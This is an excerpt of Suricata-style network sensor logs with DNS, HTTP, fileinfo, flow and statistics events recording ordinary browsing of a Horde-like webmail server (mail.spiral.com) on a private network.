{"timestamp":"2020-02-29T00:14:49.316701+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51339,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25357,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:49.421564+0000","flow_id":2108866204128541,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51339,"proto":"UDP","dns":{"type":"answer","id":25357,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:49.540560+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677}} 
{"timestamp":"2020-02-29T00:14:50.000198+0000","event_type":"stats","stats":{"uptime":14542,"capture":{"kernel_packets":135743,"kernel_drops":0},"decoder":{"pkts":135756,"bytes":93455039,"invalid":188,"ipv4":134249,"ipv6":8,"ethernet":135756,"raw":0,"null":0,"sll":0,"tcp":128910,"udp":5136,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2783,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2799,"synack":2790,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1822,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2347,"failed_udp":112},"tx":{"http":4678,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2427}},"flow_mgr":{"closed_pruned":2764,"new_pruned":15,"est_pruned":2389,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24131,"memcap_state":0,"memcap_global":0},"http":{"memuse":105616,"memcap":0}}} 
{"timestamp":"2020-02-29T00:14:50.001602+0000","flow_id":1254571419460852,"event_type":"flow","src_ip":"192.168.10.122","src_port":45436,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:49.091380+0000","end":"2020-02-29T00:09:49.199155+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:51.217864+0000","flow_id":1918758066486106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34834,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3979},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":0}} {"timestamp":"2020-02-29T00:14:52.000425+0000","flow_id":36578839428506,"event_type":"flow","src_ip":"192.168.10.130","src_port":34822,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1297,"bytes_toclient":8197,"start":"2020-02-29T00:13:46.261530+0000","end":"2020-02-29T00:13:51.621886+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:52.729829+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49156,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":872,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:52.835054+0000","flow_id":1936470511985381,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49156,"proto":"UDP","dns":{"type":"answer","id":872,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:52.981007+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092}} {"timestamp":"2020-02-29T00:14:53.002720+0000","flow_id":280640340632148,"event_type":"flow","src_ip":"192.168.10.122","src_port":52733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:52.533076+0000","end":"2020-02-29T00:09:52.641396+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:54.541786+0000","flow_id":30355435553035,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52758,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5677},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":29738,"tx_id":2}} {"timestamp":"2020-02-29T00:14:55.960466+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5092},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":27259,"tx_id":0}} {"timestamp":"2020-02-29T00:14:55.970053+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37041,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:56.074979+0000","flow_id":1364947804081477,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35285,"proto":"UDP","dns":{"type":"answer","id":37041,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:14:56.602528+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683}} {"timestamp":"2020-02-29T00:14:57.000627+0000","event_type":"stats","stats":{"uptime":14549,"capture":{"kernel_packets":135801,"kernel_drops":0},"decoder":{"pkts":135801,"bytes":93472586,"invalid":188,"ipv4":134294,"ipv6":8,"ethernet":135801,"raw":0,"null":0,"sll":0,"tcp":128948,"udp":5143,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765
,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":155319,"memcap":0}}} {"timestamp":"2020-02-29T00:15:01.606087+0000","flow_id":1847126602345263,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34836,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20683},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:04.000225+0000","flow_id":218925971392270,"event_type":"flow","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":16,"bytes_toserver":1974,"bytes_toclient":15190,"start":"2020-02-29T00:13:53.116494+0000","end":"2020-02-29T00:14:02.767022+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:15:04.000274+0000","event_type":"stats","stats":{"uptime":14556,"capture":{"kernel_packets":135832,"kernel_drops":0},"decoder":{"pkts":135834,"bytes":93495893,"invalid":188,"ipv4":134327,"ipv6":8,"ethernet":135834,"raw":0,"null":0,"sll":0,"tcp":128980,"udp":5144,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2784,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2800,"synack":2791,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1823,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2351,"failed_udp":112},"tx":{"http":4682,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2431}},"flow_mgr":{"closed_pruned":2765,"new_pruned":15,"est_pruned":2391,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":2119,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:06.000144+0000","flow_id":1338237383344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":52542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:04.262384+0000","end":"2020-02-29T00:10:04.370921+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:08.716126+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49690,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":9874,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:08.826187+0000","flow_id":347324023631198,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49690,"proto":"UDP","dns":{"type":"answer","id":9874,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20}} {"timestamp":"2020-02-29T00:15:08.909028+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/delete.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/search.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/turba\/delete.php","state":"CLOSED","stored":false,"size":77,"tx_id":0}} {"timestamp":"2020-02-29T00:15:08.930159+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34528,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":40775,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:09.000182+0000","flow_id":23809887247118,"event_type":"flow","src_ip":"192.168.10.122","src_port":58586,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.203534+0000","end":"2020-02-29T00:10:07.311742+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:15:09.000397+0000","flow_id":691737431344368,"event_type":"flow","src_ip":"192.168.10.122","src_port":45470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:10:07.034032+0000","end":"2020-02-29T00:10:07.142311+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.038527+0000","flow_id":376680125051247,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34528,"proto":"UDP","dns":{"type":"answer","id":40775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.109992+0000","flow_id":422730764433898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/search.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4067}} {"timestamp":"2020-02-29T00:15:09.186121+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34810,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37474,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:09.294351+0000","flow_id":1067809082562313,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34810,"proto":"UDP","dns":{"type":"answer","id":37474,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:09.486294+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990}} 
{"timestamp":"2020-02-29T00:15:12.000160+0000","event_type":"stats","stats":{"uptime":14564,"capture":{"kernel_packets":135848,"kernel_drops":0},"decoder":{"pkts":135873,"bytes":93512839,"invalid":188,"ipv4":134366,"ipv6":8,"ethernet":135873,"raw":0,"null":0,"sll":0,"tcp":129013,"udp":5150,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2786,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2802,"synack":2793,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1825,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2354,"failed_udp":112},"tx":{"http":4685,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2434}},"flow_mgr":{"closed_pruned":2766,"new_pruned":15,"est_pruned":2394,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24132,"memcap_state":0,"memcap_global":0},"http":{"memuse":139580,"memcap":0}}} 
{"timestamp":"2020-02-29T00:15:12.002010+0000","flow_id":756720302109332,"event_type":"flow","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1153,"bytes_toclient":7795,"start":"2020-02-29T00:14:05.864916+0000","end":"2020-02-29T00:14:11.316494+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:12.596564+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6990},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37033,"tx_id":0}} {"timestamp":"2020-02-29T00:15:12.611502+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54842,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:15:12.719590+0000","flow_id":148136325567662,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45317,"proto":"UDP","dns":{"type":"answer","id":54842,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:13.267260+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:15:13.410859+0000","flow_id":2078036930179823,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34840,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:15:13.425463+0000","flow_id":1624213506063863,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43745,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56364,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
